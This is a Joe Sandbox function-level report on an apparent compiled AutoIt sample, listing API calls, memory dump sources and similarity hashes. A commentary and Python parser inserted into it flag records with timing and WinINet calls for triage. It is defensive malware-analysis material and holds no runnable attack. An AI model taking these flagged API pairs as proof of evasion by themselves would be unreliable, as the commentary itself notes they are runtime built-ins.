                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ContainedObject
                                            • String ID: AutoIt3GUI$Container
                                            • API String ID: 3565006973-3941886329
                                            • Opcode ID: 5b2640f6d054fcc6d16c6c8bc1c8f0b5b4e21b1d7962df07b14c0976a91d80ed
                                            • Instruction ID: 35f4f513ce638eb181f03685be9ac486d2e7b8d4dcf106456ed3068d8e9fb8cb
                                            • Opcode Fuzzy Hash: 5b2640f6d054fcc6d16c6c8bc1c8f0b5b4e21b1d7962df07b14c0976a91d80ed
                                            • Instruction Fuzzy Hash: A99127706007059FDB14DF68D884E6ABBB9FF89714F14896DF94ACB291DB70E841CBA0
                                            APIs
                                            • Sleep.KERNEL32(00000000), ref: 0081BCDA
                                            • GlobalMemoryStatusEx.KERNEL32 ref: 0081BCF3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: GlobalMemorySleepStatus
                                            • String ID: @
                                            • API String ID: 2783356886-2766056989
                                            • Opcode ID: 558102fde0359c8aed35786248529b767c9fbcd4727921cc39c4dabd26ae5e46
                                            • Instruction ID: e6906610d67f5dbff2ecb33e9d5943f7742e7d7f82f7cf2f11ad89084dc7bc12
                                            • Opcode Fuzzy Hash: 558102fde0359c8aed35786248529b767c9fbcd4727921cc39c4dabd26ae5e46
                                            • Instruction Fuzzy Hash: E15126714087489BE320AF18D886BAFBBECFF95354F414C4DF1C8810A6DB7085A98757
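Each entry above is a Joe Sandbox function record: the Windows APIs a disassembled function calls (with the call-site address and, for subcalls, the parent function), the memory dump region the function was lifted from, and the identifiers under the Similarity heading (API ID, String ID, Opcode ID, Instruction Fuzzy Hash) that let functions be matched across reports. Two caveats for triage. First, strings such as AutoIt3GUI and $AUTOITCALLVARIABLE%d in neighbouring records, together with the "compiled AutoIt script" signature, indicate that the module at 0x800000 is the AutoIt interpreter, so an API pair like Sleep plus GlobalMemoryStatusEx here is a runtime built-in and only becomes evidence of evasion once the decompiled script is seen to use it. Second, with hundreds of such records per report, reading them by hand does not scale. The Python below is an added example, not part of the report or of Joe Sandbox's tooling: it parses record text in the layout shown on this page into structured entries and flags the ones whose direct API calls hit a watchlist. The watchlist is an assumption chosen for illustration, and the sample input is constructed from two records on this page.

```python
"""Parse Joe Sandbox function records and flag API patterns worth a closer look.

Added example, not Joe Sandbox code.  The record layout (APIs / Strings /
Memory Dump Source / Joe Sandbox IDA Plugin / Similarity) follows the report
text; the WATCH set below is an assumed watchlist for illustration only.
"""
import re

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function ADDR: ".
# Some calls (e.g. GlobalMemoryStatusEx.KERNEL32 ref: ...) carry no argument list.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# Assumed watchlist: timing/environment probes and WinINet use a triager would
# want surfaced from the many records in a report.
WATCH = {"Sleep", "GlobalMemoryStatusEx", "GetTickCount", "IsDebuggerPresent",
         "OutputDebugStringW", "InternetOpenW", "InternetSetOptionW", "InternetCrackUrlW"}


def _new_record():
    return {"apis": [], "strings": [], "dump": {"source_file": None, "associated": []},
            "snapshot": None, "similarity": {}}


def parse_records(text):
    """Split report text into one dict per function record (each starts at 'APIs')."""
    records, section, rec = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":            # every record begins with its API list
                rec = _new_record()
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                rec["apis"].append(m.groupdict())
        elif section == "Strings":
            rec["strings"].append(body)
        elif section == "Memory Dump Source":
            key, _, value = body.partition(":")
            value = value.strip()
            if key == "Source File":
                rec["dump"]["source_file"] = value
            elif key == "Associated":
                # the web page fuses the 'Download File' link text onto the dump name
                rec["dump"]["associated"].append(value.removesuffix("Download File"))
        elif section == "Joe Sandbox IDA Plugin":
            key, _, value = body.partition(":")
            if key == "Snapshot File":
                rec["snapshot"] = value.strip()
        elif section == "Similarity":
            key, _, value = body.partition(":")   # 'String ID:' may have an empty value
            rec["similarity"][key.strip()] = value.strip()
    return records


def flag_records(records, watch=WATCH):
    """Return records whose direct (non-subcall) API names intersect the watchlist."""
    flagged = []
    for rec in records:
        names = {a["name"] for a in rec["apis"] if a["parent"] is None}
        hits = sorted(names & watch)
        if hits:
            flagged.append({
                "instruction_fuzzy_hash": rec["similarity"].get("Instruction Fuzzy Hash"),
                "api_id": rec["similarity"].get("API ID"),
                "refs": [a["ref"] for a in rec["apis"] if a["name"] in hits],
                "hits": hits,
            })
    return flagged


# Constructed sample: two records copied from this report, trimmed to the essentials.
SAMPLE = """\
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0083B2DF
• UnloadUserProfile.USERENV(?,?), ref: 0083B2EB
• CloseHandle.KERNEL32(?), ref: 0083B2F4
  • Part of subcall function 0083AB24: HeapFree.KERNEL32(00000000), ref: 0083AB32
Memory Dump Source
• Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
• Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Instruction Fuzzy Hash: A2E0EC3A104106BFDB013FA9EC08859FFB6FF983213108221F625816B1DB32A871EB91
APIs
• Sleep.KERNEL32(00000000), ref: 0081BCDA
• GlobalMemoryStatusEx.KERNEL32 ref: 0081BCF3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Instruction Fuzzy Hash: E15126714087489BE320AF18D886BAFBBECFF95354F414C4DF1C8810A6DB7085A98757
"""

if __name__ == "__main__":
    for hit in flag_records(parse_records(SAMPLE)):
        print(hit["hits"], hit["refs"], hit["instruction_fuzzy_hash"])
```

Subcall entries are kept but excluded from flagging, since a watchlist hit inside a shared helper would otherwise light up every caller; the Instruction Fuzzy Hash is carried along so a flagged function can be looked up again in other reports on the same family.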
                                            APIs
                                              • Part of subcall function 008044ED: __fread_nolock.LIBCMT ref: 0080450B
                                            • _wcscmp.LIBCMT ref: 0084C65D
                                            • _wcscmp.LIBCMT ref: 0084C670
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscmp$__fread_nolock
                                            • String ID: FILE
                                            • API String ID: 4029003684-3121273764
                                            • Opcode ID: a5a4a35743337e02e98fcb300d0e770f62b552c55dc40f0f0a3af649b0cc51d6
                                            • Instruction ID: 8e2c35cc11a63a7c367e426cf215bc33fac298818514e8b541b763b2ad81d586
                                            • Opcode Fuzzy Hash: a5a4a35743337e02e98fcb300d0e770f62b552c55dc40f0f0a3af649b0cc51d6
                                            • Instruction Fuzzy Hash: 1A41E572A4021ABADF609BA89C42FEF77BDFF49704F014069F605EB181D6709A448B61
                                            APIs
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0086A85A
                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0086A86F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: '
                                            • API String ID: 3850602802-1997036262
                                            • Opcode ID: b313c507c623e745f8e1c4fb34fa98bf0cc07724d8eb8fb62f96d90c5f80996e
                                            • Instruction ID: a9d4eeba962876268cfafd468ca43191b80fd4f6bd9d206dba0065326d95e1a3
                                            • Opcode Fuzzy Hash: b313c507c623e745f8e1c4fb34fa98bf0cc07724d8eb8fb62f96d90c5f80996e
                                            • Instruction Fuzzy Hash: 1341E774A013099FDB58CFA8D881BDABBB9FB09304F15016AE905EB381D770A941CF91
                                            APIs
                                            • _memset.LIBCMT ref: 00855190
                                            • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 008551C6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CrackInternet_memset
                                            • String ID: |
                                            • API String ID: 1413715105-2343686810
                                            • Opcode ID: c3f68bc0162e5fd21252e4193def18350a9f2f282644b0a37069574d6ae9c1d3
                                            • Instruction ID: 78e0885407667d2e9f1d93cc7553f3539e5d4d569edae79a7fee278dada54cfc
                                            • Opcode Fuzzy Hash: c3f68bc0162e5fd21252e4193def18350a9f2f282644b0a37069574d6ae9c1d3
                                            • Instruction Fuzzy Hash: 87313B71C00119ABCF41EFE8CD85AEE7FB9FF14714F100115F815A6166EB31A956CBA1
                                            APIs
                                            • DestroyWindow.USER32(?,?,?,?), ref: 0086980E
                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0086984A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$DestroyMove
                                            • String ID: static
                                            • API String ID: 2139405536-2160076837
                                            • Opcode ID: 4600f75cce2563a97a1612c8fb48203a64f28b753d71e6d8497e318dfe5258ef
                                            • Instruction ID: 1092e147b425fdfe5f475ce83f591f897d2c642bd8a4203bf2cb144a6e009752
                                            • Opcode Fuzzy Hash: 4600f75cce2563a97a1612c8fb48203a64f28b753d71e6d8497e318dfe5258ef
                                            • Instruction Fuzzy Hash: B4317E71110604AEEB109F78CC81BFB77ADFF99764F118629F9A9C7190DA31AC81C760
                                            APIs
                                            • _memset.LIBCMT ref: 008451C6
                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00845201
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: InfoItemMenu_memset
                                            • String ID: 0
                                            • API String ID: 2223754486-4108050209
                                            • Opcode ID: 20d0bdff8650b6a78b42dc032428ad9eef64d3fbc435fe60c5d6862aaff28efd
                                            • Instruction ID: 0caf74d83af9e6ca2fa9ef57eaa71472756c7b1b708236b70bc6cc911db785c0
                                            • Opcode Fuzzy Hash: 20d0bdff8650b6a78b42dc032428ad9eef64d3fbc435fe60c5d6862aaff28efd
                                            • Instruction Fuzzy Hash: 5B31E63160072CABEB24CF99D845B9EBBF8FF45354F14401BE981E61A2D7B09A44CB11
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __snwprintf
                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                            • API String ID: 2391506597-2584243854
                                            • Opcode ID: 5e3fa0a3f06a16b209eaf1d2ba1fa020a1bcba508435c307f567d212ba37e287
                                            • Instruction ID: 012fb6d07cffebc3fb991915d8db0a8c39e842591b9ef36eff9f1b3ff0df81cf
                                            • Opcode Fuzzy Hash: 5e3fa0a3f06a16b209eaf1d2ba1fa020a1bcba508435c307f567d212ba37e287
                                            • Instruction Fuzzy Hash: 57217F71600218AACF14EFA8CC82AAE77B4FF55301F400459F505EB281EB70EA59CBA2
                                            APIs
                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0086945C
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00869467
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: Combobox
                                            • API String ID: 3850602802-2096851135
                                            • Opcode ID: 3a09428cc266cd29630e9403186191f0c0028ebb72ff586377e7043a083d9b10
                                            • Instruction ID: 01367b7c1bbe3a5b0ed60e6ab61ed03a1baf07a672f07c25306da2466cfed8b1
                                            • Opcode Fuzzy Hash: 3a09428cc266cd29630e9403186191f0c0028ebb72ff586377e7043a083d9b10
                                            • Instruction Fuzzy Hash: 701190B1200208AFEF119F58DC80EBB376EFB583A4F110125F958DB2D0DA319C528764
                                            APIs
                                              • Part of subcall function 0081D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0081D1BA
                                              • Part of subcall function 0081D17C: GetStockObject.GDI32(00000011), ref: 0081D1CE
                                              • Part of subcall function 0081D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0081D1D8
                                            • GetWindowRect.USER32(00000000,?), ref: 00869968
                                            • GetSysColor.USER32(00000012), ref: 00869982
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                            • String ID: static
                                            • API String ID: 1983116058-2160076837
                                            • Opcode ID: 034a2ab7117407bf45092fa25f4b8c218aa981f74e7f75a6430e98ae4886df1b
                                            • Instruction ID: 97488b62aaf70896b5d67df019585314e91645306ef70860654ebed6ddd72b09
                                            • Opcode Fuzzy Hash: 034a2ab7117407bf45092fa25f4b8c218aa981f74e7f75a6430e98ae4886df1b
                                            • Instruction Fuzzy Hash: 0B112672520209AFDB05DFB8CC45EFA7BA8FB08354F054629F995E6290E734E850DB60
                                            APIs
                                            • GetWindowTextLengthW.USER32(00000000), ref: 00869699
                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008696A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LengthMessageSendTextWindow
                                            • String ID: edit
                                            • API String ID: 2978978980-2167791130
                                            • Opcode ID: 6a253ca859502271c8dd7f1c5ab4090fb657fdfbf3698e7d0ec6ec20303e4b38
                                            • Instruction ID: 39a3de3f84ba5375ee2879da2e94ae54d26853b494095af76270a75e384b72c6
                                            • Opcode Fuzzy Hash: 6a253ca859502271c8dd7f1c5ab4090fb657fdfbf3698e7d0ec6ec20303e4b38
                                            • Instruction Fuzzy Hash: 97115871100208AAEF119F68DC84EEB3B6EFB25378F514314F9A5D61E0C7359C519760
                                            APIs
                                            • _memset.LIBCMT ref: 008452D5
                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008452F4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: InfoItemMenu_memset
                                            • String ID: 0
                                            • API String ID: 2223754486-4108050209
                                            • Opcode ID: 0e32a7d1b8ff9929a2244118bb53b1002b76c9364ca2e4a88bc9510157c12ada
                                            • Instruction ID: a3d095648c6750b698ad162fb4747c75ebbe00b8abfd9911f49fa44ccac45f34
                                            • Opcode Fuzzy Hash: 0e32a7d1b8ff9929a2244118bb53b1002b76c9364ca2e4a88bc9510157c12ada
                                            • Instruction Fuzzy Hash: 9211BE72A0162CABDB20DFD8D944B9D77B8FB06B54F040126E941E729AE3B0AD04CB91
                                            APIs
                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00854DF5
                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00854E1E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Internet$OpenOption
                                            • String ID: <local>
                                            • API String ID: 942729171-4266983199
                                            • Opcode ID: c589e6f2fbee91f36db798d03e18d09f6680dd697e29cee56b9d89bfc8d2c8a6
                                            • Instruction ID: 4a5f7ffa470b48bd5b8448a3baf0c3e901edc8a222975f9fa5750a2198694c77
                                            • Opcode Fuzzy Hash: c589e6f2fbee91f36db798d03e18d09f6680dd697e29cee56b9d89bfc8d2c8a6
                                            • Instruction Fuzzy Hash: 5511A070501225BBDB258F51CC89EFBFBB8FF0676AF10922AF915D6140D3705988D6E0
                                            APIs
                                            • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0085A84E
                                            • htons.WSOCK32(00000000,?,00000000), ref: 0085A88B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: htonsinet_addr
                                            • String ID: 255.255.255.255
                                            • API String ID: 3832099526-2422070025
                                            • Opcode ID: c4820b1aa639044e3e2d30a274b07f5bd164d9da906c77f4cd5ef56bf9d1d986
                                            • Instruction ID: 867b683caffea46dba9f9bc56f5e0320ac9e9e85979d030e6d94e6f50d8e99b9
                                            • Opcode Fuzzy Hash: c4820b1aa639044e3e2d30a274b07f5bd164d9da906c77f4cd5ef56bf9d1d986
                                            • Instruction Fuzzy Hash: 20012274200304ABCB24AF68C886FA9B365FF44324F108666F912EB2D1DB71E8098752
                                            APIs
                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0083B7EF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 3850602802-1403004172
                                            • Opcode ID: 94981a410fba30935b2bcbe23bd481238d8c2381302c767eb8d7ea79202f7a02
                                            • Instruction ID: 0be0257e9fcd1b530424f2d2f92181a0e3f00b928ee3ce42273c2381f6a85dc3
                                            • Opcode Fuzzy Hash: 94981a410fba30935b2bcbe23bd481238d8c2381302c767eb8d7ea79202f7a02
                                            • Instruction Fuzzy Hash: A301B1B1641118ABCB44EFA8CC529FE7369FF85350B040719F962E72D2EB7459088791
                                            APIs
                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 0083B6EB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 3850602802-1403004172
                                            • Opcode ID: 1318e25f0111e4fcebb942b74741544a716ac0b642522857fd2d573b5517be0d
                                            • Instruction ID: c6aaf4dc147cf172dc495d17c88ab34125c7277b843c66be549d993cb5839b68
                                            • Opcode Fuzzy Hash: 1318e25f0111e4fcebb942b74741544a716ac0b642522857fd2d573b5517be0d
                                            • Instruction Fuzzy Hash: 1A018BB1641108ABCB44EBA8CD63AFE73A8FB55344F100129B902E32D2EB545E1887E6
                                            APIs
                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 0083B76C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
